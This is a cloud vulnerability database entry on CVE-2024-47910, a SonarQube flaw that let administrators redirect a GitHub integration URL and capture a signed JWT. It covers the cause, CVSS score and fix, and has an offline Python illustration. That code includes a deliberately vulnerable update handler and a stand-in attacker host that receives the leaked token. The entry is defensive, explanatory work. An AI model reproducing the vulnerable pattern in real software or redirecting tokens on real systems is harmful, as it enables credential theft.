
Cloud Vulnerability DB
An open project to list all known cloud vulnerabilities and Cloud Service Provider security issues
A vulnerability was discovered in SonarSource SonarQube before version 9.9.5 LTA and in 10.x before 10.5, tracked as CVE-2024-47910. It allows a SonarQube user with the Administrator role to modify an existing GitHub integration configuration so that a pre-signed JWT is sent to a location of the administrator's choosing, i.e. exfiltrated. The issue was discovered by security researchers at Synacktiv on February 19, 2024, and was fixed in June 2024 (Sonar Community).
The root cause is improper access control (CWE-284) in the GitHub integration configuration: the GitHub API URL of an existing integration could be changed on its own, while the private key already stored for that integration stayed in place. Because SonarQube signs a JWT with that key and presents it to the configured API URL, pointing the URL at an attacker-controlled host causes the server to hand over a valid, ready-to-use token. The vulnerability has been assigned a CVSS v3.1 base score of 7.2 (HIGH) with the vector string CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (NVD).
If exploited, the vulnerability exposes a pre-signed JWT that authenticates as the integrated GitHub App, potentially giving the attacker unauthorized access to the GitHub resources that integration can reach. The impact on affected systems is significant, but exploitation requires Administrator privileges in SonarQube (reflected in the PR:H component of the vector), so the realistic threat is a malicious or compromised administrator who can edit integration settings but does not legitimately hold the GitHub App's private key (Sonar Community).
The vulnerability is fixed in SonarQube 9.9.5 LTA and 10.5, released on June 25, 2024. The fix requires an administrator to supply the integration's private key again when modifying the GitHub API URL, so the stored key can no longer be redirected to a new destination by someone who does not possess it. Users are strongly advised to upgrade to these versions or later. Additional security patches are available in versions 9.9.6 LTA and 10.6 (Sonar Community).
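The following is an added illustration of the pattern described above, not SonarQube's code: a stored signing key that follows an editable destination URL. It contrasts a configuration-update handler in the vulnerable shape (URL editable on its own, key retained) with the fixed shape (a URL change must be accompanied by the private key). The integration record, the URLs, the placeholder key bytes and the HMAC-SHA256 signature (a stand-in for the RS256 signature real GitHub Apps use) are all assumptions made so the example runs offline with the standard library only.

```python
import base64
import hashlib
import hmac
import json
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: an existing GitHub App integration record as a server would
# store it. The key bytes are a placeholder, not real key material (assumption).
STORED_KEY = b"placeholder-app-private-key-not-real"
TRUSTED_URL = "https://api.github.com"
ATTACKER_URL = "https://attacker.example/collect"  # hypothetical collector


@dataclass
class GitHubIntegration:
    app_id: str
    api_url: str
    private_key: bytes  # write-only from the UI; only the server signs with it


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_app_jwt(integration: GitHubIntegration, now: int) -> str:
    """Sign the short-lived JWT a GitHub App presents to the API.

    Real GitHub Apps sign with RS256; HMAC-SHA256 is a stand-in here so the
    example needs no RSA library (assumption). The structure is the same.
    """
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    claims = _b64url(json.dumps(
        {"iat": now - 60, "exp": now + 600, "iss": integration.app_id}).encode())
    signing_input = f"{header}.{claims}".encode()
    sig = hmac.new(integration.private_key, signing_input, hashlib.sha256).digest()
    return f"{header}.{claims}.{_b64url(sig)}"


def jwt_signed_by(token: str, key: bytes) -> bool:
    """True if the token verifies under `key`, i.e. it is usable as-is by whoever holds it."""
    header, claims, sig = token.split(".")
    expected = hmac.new(key, f"{header}.{claims}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(_b64url(expected), sig)


def validate_integration(integration: GitHubIntegration,
                         outbound: List[Tuple[str, str]], now: int) -> None:
    """Model of a connectivity check: sign a JWT and send it to the configured URL.
    `outbound` stands in for the HTTP client and records (url, token) pairs."""
    outbound.append((integration.api_url, make_app_jwt(integration, now)))


def update_vulnerable(integration: GitHubIntegration, new_url: str,
                      private_key: Optional[bytes] = None) -> GitHubIntegration:
    """Pre-fix pattern: the URL is editable on its own and the stored key is kept,
    so the next validation sends a freshly signed JWT to whatever URL was set."""
    integration.api_url = new_url
    if private_key is not None:
        integration.private_key = private_key
    return integration


def update_fixed(integration: GitHubIntegration, new_url: str,
                 private_key: Optional[bytes] = None) -> GitHubIntegration:
    """Post-fix pattern: changing the destination requires presenting the private
    key, binding the stored secret to the endpoint it will be sent to."""
    if new_url != integration.api_url and private_key is None:
        raise PermissionError("changing the GitHub API URL requires supplying the private key")
    integration.api_url = new_url
    if private_key is not None:
        integration.private_key = private_key
    return integration


def run_scenario(update) -> dict:
    """An admin who does not hold the key points the integration at ATTACKER_URL."""
    integ = GitHubIntegration("12345", TRUSTED_URL, STORED_KEY)
    outbound: List[Tuple[str, str]] = []
    try:
        update(integ, ATTACKER_URL)  # no private key supplied
    except PermissionError as exc:
        return {"blocked": True, "reason": str(exc), "leaked": False}
    validate_integration(integ, outbound, now=1_700_000_000)
    url, token = outbound[-1]
    # "leaked" is True when a token valid under the stored key reached the new URL
    return {"blocked": False, "url": url, "leaked": jwt_signed_by(token, STORED_KEY)}


if __name__ == "__main__":
    print("vulnerable:", run_scenario(update_vulnerable))
    print("fixed:     ", run_scenario(update_fixed))
```

The check in `update_fixed` is deliberately tied to the URL changing rather than to the role of the caller: the Administrator role is legitimate, so the control has to come from possession of the secret, not from who is logged in. The same pattern applies to any integration where a server-held credential is sent to an operator-editable endpoint (webhooks, SCM and CI tokens, OAuth client secrets).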
Source: This report was generated using AI